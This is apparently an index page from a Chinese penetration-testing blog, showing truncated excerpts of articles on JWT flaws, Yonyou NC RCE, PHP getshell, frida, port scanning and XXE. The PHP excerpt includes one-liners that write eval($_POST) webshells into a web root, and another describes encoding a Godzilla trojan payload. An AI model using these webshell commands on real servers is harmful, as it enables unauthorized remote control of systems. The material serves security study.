故事的起因 前几天收到一封邮件，内容是这样的： 你说发谁哪里不好，发到我这里来，正好最近辞职了没事干，搞下看看。 加上那个人的好友以后，象征性的聊了几句，大概就是：我说自己因为网赌没...

https://github.com/xsxtw/web_pwd_common_crack在此基础上增加了很多拓展功能使其更加强大 1 前言 在做安全测试的时候，随着资产的增多，经常会遇到需要快速检测大量网站后台弱口令的问题。 然...

JWT 漏洞 在用户注册或登录后，我们想记录用户的登录状态，或者为用户创建身份认证的凭证。我们不再使用 Session 认证机制，而使用 Json Web Token 认证机制。 1 什么是 JWT Json web token (...

平常遇到用友 nc rce 可以通过 exec 进行命令执行，但在不出网的场景下则需要其他方法 首先生成一个哥斯拉的 jsp 木马，然后进行 unicode 编码 再把输出结果进行 url 编码 最后发送数据包如下 S...

php代码执行&命令执行 getshell echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php bypass 绕过...

frida hook 环境搭建 安装模块 安装 frida 模块和 frida-tools 模块 python -m pip install frida python -m pip install frida-tools 安装 adb https://developer.android.com/studio/releases...

引言 在渗透过程中，经常会遇到 nmap 扫描不出端口的情况，web 端口确定开放，且用网上的在线端口扫描是可以扫描到的，但是 nmap 就是无法扫出来，因此花了些时间写了 2 个基于 python 端口扫描...

动机： 在一次安全会议上，我发现一个人穿着一件 T 恤，上面写着“我黑了荷兰政府，我得到的只是这件糟糕的 T 恤。” ” 出于好奇，我走近他询问他是如何得到它的。我决心要得到那件很酷的...

PS: 文中 XML 代码用代码框显示会出错，故用黄色标明（格式已做调整可以直接使用） 准备工作： Centos7 主机一台，安装 httpd、php 以及 xml 服务 yum -y install httpd httpd-devel php php-xm...